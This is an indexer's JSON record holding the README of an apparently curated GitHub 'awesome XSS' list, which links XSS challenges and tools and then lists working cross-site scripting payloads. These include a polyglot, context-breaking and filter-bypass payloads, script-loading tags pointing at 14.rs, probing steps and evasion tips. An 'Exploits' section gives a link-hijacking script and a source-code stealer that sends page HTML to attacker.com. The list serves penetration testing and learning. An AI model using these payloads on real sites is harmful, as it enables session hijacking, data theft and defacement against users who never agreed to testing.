{"id":22560018,"url":"https://github.com/paulveillard/cybersecurity-cross-site-scripting","last_synced_at":"2026-02-26T01:55:12.858Z","repository":{"id":109657522,"uuid":"454603690","full_name":"paulveillard/cybersecurity-cross-site-scripting","owner":"paulveillard","description":"An ongoing curated collection of awesome XSS software, libraries, frameworks, learning tutorials \u0026 practical resources cross-site scripting.","archived":false,"fork":false,"pushed_at":"2022-02-02T01:15:29.000Z","size":53,"stargazers_count":9,"open_issues_count":0,"forks_count":2,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-10-19T12:49:48.201Z","etag":null,"topics":["cross-site-scripting","penetration-testing-tools","vulnerability-assessment","vulnerability-detection","vulnerability-identification","vulnerability-scanners","xss","xss-attacks","xss-detection","xss-exploitation","xss-filter","xss-injection","xss-payloads","xss-poc","xss-scanner","xss-vulnerability"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/paulveillard.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":"code-of-conduct.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"security-write-ups-and-POCs.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-02-02T01:00:02.000Z","updated_at":"2025-08-19T09:47:52.000Z","dependencies_parsed_at":"2023-05-09T17:45:21.758Z","dependency_job_id":null,"html_url":"https://github.com/paulveillard/cybersecurity-cross-site-scripting","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/paulveillard/cybersecurity-cross-site-scripting","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/paulveillard","download_url":"https://codeload.github.com/paulveillard/cybersecurity-cross-site-scripting/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29848629,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-25T22:37:40.667Z","status":"ssl_error","status_checked_at":"2026-02-25T22:37:25.960Z","response_time":61,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cross-site-scripting","penetration-testing-tools","vulnerability-assessment","vulnerability-detection","vulnerability-identification","vulnerability-scanners","xss","xss-attacks","xss-detection","xss-exploitation","xss-filter","xss-injection","xss-payloads","xss-poc","xss-scanner","xss-vulnerability"],"created_at":"2024-12-07T21:10:32.838Z","updated_at":"2026-02-26T01:55:12.830Z","avatar_url":"https://github.com/paulveillard.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Cross-Site Scripting\n\n\n\u003e An ongoing curated collection of awesome XSS software, libraries, frameworks, learning tutorials \u0026 practical resources cross-site scripting.\n\u003e Thanks to all contributors, you're awesome and wouldn't be possible without you! Our goal is to build a categorized community-driven collection of very well-known resources.\n\n## What is Cross-site Scripting?\nCross-site Scripting (XSS) is a client-side code injection attack. [Cross-site scripting](https://portswigger.net/web-security/cross-site-scripting) (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. \n\n## Table of contents\n\n### XSS contents\n- [Challenges](https://github.com/s0md3v/AwesomeXSS#awesome-challenges)\n- [Reads \u0026 Presentations](https://github.com/s0md3v/AwesomeXSS#awesome-reads--presentations)\n- [Tools](https://github.com/s0md3v/AwesomeXSS#awesome-tools)\n- [Mind maps](https://github.com/s0md3v/AwesomeXSS#awesome-xss-mind-maps)\n- [DOM XSS](https://github.com/s0md3v/AwesomeXSS#awesome-dom-xss)\n- [Payloads](https://github.com/s0md3v/AwesomeXSS#awesome-payloads)\n- [Polyglots](https://github.com/s0md3v/AwesomeXSS#awesome-polyglots)\n- [Tags and event handlers](https://github.com/s0md3v/AwesomeXSS#awesome-tags--event-handlers)\n- [Context breaking](https://github.com/s0md3v/AwesomeXSS#awesome-context-breaking)\n    - [HTML context](https://github.com/s0md3v/AwesomeXSS#html-context)\n    - [Attribute context](https://github.com/s0md3v/AwesomeXSS#attribute-context)\n    - [JavaScript context](https://github.com/s0md3v/AwesomeXSS#javascript-context)\n- [Confirm Variants](https://github.com/s0md3v/AwesomeXSS#awesome-confirm-variants)\n- [Exploits](https://github.com/s0md3v/AwesomeXSS#awesome-exploits)\n- [Probing](https://github.com/s0md3v/AwesomeXSS#awesome-probing)\n- [Bypassing](https://github.com/s0md3v/AwesomeXSS#awesome-bypassing)\n- [Encoding](https://github.com/s0md3v/AwesomeXSS#awesome-encoding)\n- [Tips \u0026 tricks](https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks)\n\n### XSS Challenges\n- [prompt.ml](https://prompt.ml)\n- [alf.nu/alert1](https://alf.nu/alert1)\n- [s-p-o-o-k-y.com](https://www.s-p-o-o-k-y.com)\n- [xss-game.appspot.com](https://xss-game.appspot.com)\n- [polyglot.innerht.ml](https://polyglot.innerht.ml)\n- [sudo.co.il/xss](http://sudo.co.il/xss)\n- [hack.me/t/XSS](https://hack.me/t/XSS)\n- [root-me.org](https://www.root-me.org/?page=recherche\u0026lang=en\u0026recherche=xss)\n- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)\n- [wechall.net](https://www.wechall.net/challs/XSS)\n- [codelatte.net/xss](https://codelatte.net/xss/)\n\n### XSS Reads \u0026 Presentations\n- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)\n- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)\n- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)\n- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)\n- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)\n- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)\n- [Copy Pest](https://www.slideshare.net/x00mario/copypest)\n\n### XSS Tools\n- [XSStrike](https://github.com/UltimateHackers/XSStrike)\n- [xsshunter.com](https://xsshunter.com)\n- [BeEF](https://github.com/beefproject/beef)\n- [JShell](https://github.com/UltimateHackers/JShell)\n\n### XSS Mind Maps\nA beautiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)\n\n### DOM XSS\n\n- Does your input go into a sink? `Vulnerable`\n- It doesn't? `Not vulnerable`\n\n**Source**: An input that could be controlled by an external (untrusted) source.\n\n```\ndocument.URL\ndocument.documentURI\ndocument.URLUnencoded (IE 5.5 or later Only)\ndocument.baseURI\nlocation\nlocation.href\nlocation.search\nlocation.hash\nlocation.pathname\ndocument.cookie\ndocument.referrer\nwindow.name\nhistory.pushState()\nhistory.replaceState()\nlocalStorage\nsessionStorage\n```\n\n**Sink**: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.\n\n```\neval\nFunction\nsetTimeout\nsetInterval\nsetImmediate\nexecScript\ncrypto.generateCRMFRequest\nScriptElement.src\nScriptElement.text\nScriptElement.textContent\nScriptElement.innerText\nanyTag.onEventName\ndocument.write\ndocument.writeln\nanyElement.innerHTML\nRange.createContextualFragment\nwindow.location\ndocument.location\n```\n\nThis comprehensive list of sinks and source is taken from [domxsswiki](https://github.com/wisec/domxsswiki).\n\n### Awesome Payloads\n```\n\u003cA/hREf=\"j%0aavas%09cript%0a:%09con%0afirm%0d``\"\u003ez\n\u003cd3\"\u003c\"/onclick=\"1\u003e[confirm``]\"\u003c\"\u003ez\n\u003cd3/onmouseenter=[2].find(confirm)\u003ez\n\u003cdetails open ontoggle=confirm()\u003e\n\u003cscript y=\"\u003e\u003c\"\u003e/*\u003cscript* */prompt()\u003c/script\n\u003cw=\"/x=\"y\u003e\"/ondblclick=`\u003c`[confir\\u006d``]\u003ez\n\u003ca href=\"javascript%26colon;alert(1)\"\u003eclick\n\u003ca href=javas\u0026#99;ript:alert(1)\u003eclick\n\u003cscript/\"\u003ca\"/src=data:=\".\u003ca,[8].some(confirm)\u003e\n\u003csvg/x=\"\u003e\"/onload=confirm()//\n\u003c--`\u003cimg/src=` onerror=confirm``\u003e --!\u003e\n\u003csvg%0Aonload=%09((pro\\u006dpt))()//\n\u003csCript x\u003e(((confirm)))``\u003c/scRipt x\u003e\n\u003csvg \u003c/onload =\"1\u003e (_=prompt,_(1)) \"\"\u003e\n\u003c!--\u003e\u003cscript src=//14.rs\u003e\n\u003cembed src=//14.rs\u003e\n\u003cscript x=\"\u003e\" src=//15.rs\u003e\u003c/script\u003e\n\u003c!'/*\"/*/'/*/\"/*--\u003e\u003c/Script\u003e\u003cImage SrcSet=K */; OnError=confirm`1` //\u003e\n\u003ciframe/src \\/\\/onload = prompt(1)\n\u003cx oncut=alert()\u003ex\n\u003csvg onload=write()\u003e\n```\n\n### Awesome Polyglots\n\nHere's an XSS polyglot that I made which can break out of 20+ contexts:\n```\n%0ajavascript:`/*\\\"/*--\u003e\u0026lt;svg onload='/*\u003c/template\u003e\u003c/noembed\u003e\u003c/noscript\u003e\u003c/style\u003e\u003c/title\u003e\u003c/textarea\u003e\u003c/script\u003e\u003chtml onmouseover=\"/**/ alert()//'\"\u003e`\n```\n\nExplanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)\n\n### XSS Tags \u0026 Event Handlers\n- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)\n- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)\n\nSome less detected event handlers\n```\nontoggle\nonauxclick\nondblclick\noncontextmenu\nonmouseleave\nontouchcancel\n```\n\nSome HTML Tags that you will be using\n```\nimg\nsvg\nbody\nhtml\nembed\nscript\nobject\ndetails\nisindex\niframe\naudio\nvideo\n```\n\n### Awesome Context Breaking\n\n#### HTML Context\nCase: `\u003ctag\u003eYou searched for $input. \u003c/tag\u003e`\n\n```\n\u003csvg onload=alert()\u003e\n\u003c/tag\u003e\u003csvg onload=alert()\u003e\n```\n\n#### Attribute Context\n\nCase: `\u003ctag attribute=\"$input\"\u003e`\n\n```\n\"\u003e\u003csvg onload=alert()\u003e\n\"\u003e\u003csvg onload=alert()\u003e\u003cb attr=\"\n\" onmouseover=alert() \"\n\"onmouseover=alert()//\n\"autofocus/onfocus=\"alert()\n```\n#### JavaScript Context\n\nCase: `\u003cscript\u003e var new something = '$input'; \u003c/script\u003e`\n\n```\n'-alert()-'\n'-alert()//'\n'}alert(1);{'\n'}%0Aalert(1);%0A{'\n\u003c/script\u003e\u003csvg onload=alert()\u003e\n```\n\n### Awesome Confirm Variants\nYep, confirm because alert is too mainstream.\n```\nconfirm()\nconfirm``\n(confirm``)\n{confirm``}\n[confirm``]\n(((confirm)))``\nco\\u006efirm()\nnew class extends confirm``{}\n[8].find(confirm)\n[8].map(confirm)\n[8].some(confirm)\n[8].every(confirm)\n[8].filter(confirm)\n[8].findIndex(confirm)\n```\n\n### Awesome Exploits\n##### Replace all links\n```javascript\nArray.from(document.getElementsByTagName(\"a\")).forEach(function(i) {\n  i.href = \"https://attacker.com\";\n});\n```\n##### Source Code Stealer\n```html\n\u003csvg/onload=\"(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML\"\u003e\n```\nA good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)\n\n### Awesome Probing\nIf nothing of this works, take a look at **Awesome Bypassing** section\n\nFirst of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about number and contexts of reflections.\n\u003cbr\u003eNow for attribute context, check if double quotes (\") are being filtered by entering `x\"d3v`. If it gets altered to `x\u0026quot;d3v`, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`, if it gets altered to `x\u0026apos;`, you are doomed. The only thing you can try is encoding.\u003cbr\u003e\nIf the quotes are not being filtered, you can simply try payloads from **Awesome Context Breaking** section.\n\u003cbr\u003eFor javascript context, check which quotes are being used for example if they are doing\n```\nvariable = 'value' or variable = \"value\"\n```\nNow lets say single quotes (') are in use, in that case enter `x'd3v`. If it gets altered to `x\\'d3v`, try escaping the backslash (\\) by adding a backslash to your probe i.e. `x\\'d3v`. If it works use the following payload:\n```\n\\'-alert()//\n```\nBut if it gets altered to `x\\\\\\'d3v`, the only thing you can try is closing the script tag itself by using\n```\n\u003c/script\u003e\u003csvg onload=alert()\u003e\n```\nFor simple HTML context, the probe is `x\u003cd3v`. If it gets altered to `x\u0026gt;d3v`, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is `x\u003cxxx\u003e`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `\u003c` and `\u003e`. It can simply bypassed using\n```\n\u003csvg onload=alert()//\n```\nor this (it will not work in all cases)\n```\n\u003csvg onload=alert()\n```\nIf the your dummy tags lands in the source code as it is, go for any of these payloads\n```\n\u003csvg onload=alert()\u003e\n\u003cembed src=//14.rs\u003e\n\u003cdetails open ontoggle=alert()\u003e\n```\n\n### Awesome Bypassing\n\n**Note:** None of these payloads use single (') or double quotes (\").\n\n- Without event handlers\n```\n\u003cobject data=javascript:confirm()\u003e\n\u003ca href=javascript:confirm()\u003eclick here\n\u003cscript src=//14.rs\u003e\u003c/script\u003e\n\u003cscript\u003econfirm()\u003c/script\u003e\n```\n- Without space\n```\n\u003csvg/onload=confirm()\u003e\n\u003ciframe/src=javascript:alert(1)\u003e\n```\n- Without slash (/)\n```\n\u003csvg onload=confirm()\u003e\n\u003cimg src=x onerror=confirm()\u003e\n```\n- Without equal sign (=)\n```\n\u003cscript\u003econfirm()\u003c/script\u003e\n```\n- Without closing angular bracket (\u003e)\n```\n\u003csvg onload=confirm()//\n```\n- Without alert, confirm, prompt\n```\n\u003cscript src=//14.rs\u003e\u003c/script\u003e\n\u003csvg onload=co\\u006efirm()\u003e\n\u003csvg onload=z=co\\u006efir\\u006d,z()\u003e\n```\n- Without a Valid HTML tag\n```\n\u003cx onclick=confirm()\u003eclick here\n\u003cx ondrag=aconfirm()\u003edrag it\n```\n\n- Bypass tag blacklisting\n```\n\u003c/ScRipT\u003e\n\u003c/script\n\u003c/script/\u003e\n\u003c/script x\u003e\n```\n\n### Awesome Encoding\n\n|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|\n|----|----|-------|-----------|----|--------|----------|---|\n|`\u0026quot;`|\"|`\u0026#34;`|quotation mark|u+0022|\\0022|\\42|%22|\n|`\u0026num;`|#|`\u0026#35;`|number sign|u+0023|\\0023|\\43|%23|\n|`\u0026dollar;`|$|`\u0026#36;`|dollar sign|u+0024|\\0024|\\44|%24|\n|`\u0026percnt;`|%|`\u0026#37;`|percent sign|u+0025|\\0025|\\45|%25|\n|`\u0026amp;`|`\u0026|`\u0026#38;`|ampersand|u+0026|\\0026|\\46|%26|\n|`\u0026apos;`|'|`\u0026#39;`|apostrophe|u+0027|\\0027|\\47|%27|\n|`\u0026lpar;`|(|`\u0026#40;`|left parenthesis|u+0028|\\0028|\\50|%28|\n|`\u0026rpar;`|)|`\u0026#41;`|right parenthesis|u+0029|\\0029|\\51|%29|\n|`\u0026ast;`|*|`\u0026#42;`|asterisk|u+002A|\\002a|\\52|%2A|\n|`\u0026plus;`|+|`\u0026#43;`|plus sign|u+002B|\\002b|\\53|%2B|\n|`\u0026comma;`|,|`\u0026#44;`|comma|u+002C|\\002c|\\54|%2C|\n|`\u0026minus;`|-|`\u0026#45;`|hyphen-minus|u+002D|\\002d|\\55|%2D|\n|`\u0026period;`|.|`\u0026#46;`|full stop; period|u+002E|\\002e|\\56|%2E|\n|`\u0026sol;`|/|`\u0026#47;`|solidus; slash|u+002F|\\002f|\\57|%2F|\n|`\u0026colon;`|:|`\u0026#58;`|colon|u+003A|\\003a|\\72|%3A|\n|`\u0026semi;`|;`|`\u0026#59;`|semicolon|u+003B|\\003b|\\73|%3B|\n|`\u0026lt;`|\u003c|`\u0026#60;`|less-than|u+003C|\\003c|\\74|%3C|\n|`\u0026equals;`|=|`\u0026#61;`|equals|u+003D|\\003d|\\75|%3D|\n|`\u0026gt;`|\u003e|`\u0026#62;`|greater-than sign|u+003E|\\003e|\\76|%3E|\n|`\u0026quest;`|?|`\u0026#63;`|question mark|u+003F|\\003f|\\77|%3F|\n|`\u0026commat;`|@|`\u0026#64;`|at sign; commercial at|u+0040|\\0040|\\100|%40|\n|`\u0026lsqb;`|\\[|`\u0026#91;`|left square bracket|u+005B|\\005b|\\133|%5B|\n|`\u0026bsol;`|/|`\u0026#92;`|backslash|u+005C|\\005c|\\134|%5C|\n|`\u0026rsqb;`|]|`\u0026#93;`|right square bracket|u+005D|\\005d|\\135|%5D|\n|`\u0026Hat;`|^|`\u0026#94;`|circumflex accent|u+005E|\\005e|\\136|%5E|\n|`\u0026lowbar;`|_|`\u0026#95;`|low line|u+005F|\\005f|\\137|%5F|\n|`\u0026grave;`|\\`|`\u0026#96;`|grave accent|u+0060|\\0060|\\u0060|%60|\n|`\u0026lcub;`|{|`\u0026#123;`|left curly bracket|u+007b|\\007b|\\173|%7b|\n|`\u0026verbar;`|\\||`\u0026#124;`|vertical bar|u+007c|\\007c|\\174|%7c|\n|`\u0026rcub;`|}|`\u0026#125;`|right curly bracket|u+007d|\\007d|\\175|%7d|\n\n### Awesome Tips \u0026 Tricks\n- `http(s)://` can be shortened to `//` or `/\\\\` or `\\\\`.\n- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.\n- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`\n- You can use `//` to close a tag instead of `\u003e`.\n- I have found that `confirm` is the least detected pop-up function so stop using `alert`.\n- Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use `\u003cscript src=//14.rs\u003e` instead of `\u003cscript src=\"//14.rs\"\u003e`\n- The shortest HTML context XSS payload is `\u003cscript src=//14.rs\u003e` (19 chars)\n\n\n\n\n**[`^        back to top        ^`](#)**\n\n## License\nMIT License \u0026 [cc](https://creativecommons.org/licenses/by/4.0/) license\n\n\u003ca rel=\"license\" href=\"http://creativecommons.org/licenses/by/4.0/\"\u003e\u003cimg alt=\"Creative Commons License\" style=\"border-width:0\" src=\"https://i.creativecommons.org/l/by/4.0/88x31.png\" /\u003e\u003c/a\u003e\u003cbr /\u003eThis work is licensed under a \u003ca rel=\"license\" href=\"http://creativecommons.org/licenses/by/4.0/\"\u003eCreative Commons Attribution 4.0 International License\u003c/a\u003e.\n\nTo the extent possible under law, [Paul Veillard](https://github.com/paulveillard/) has waived all copyright and related or neighboring rights to this work.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpaulveillard%2Fcybersecurity-cross-site-scripting","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpaulveillard%2Fcybersecurity-cross-site-scripting","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpaulveillard%2Fcybersecurity-cross-site-scripting/lists"}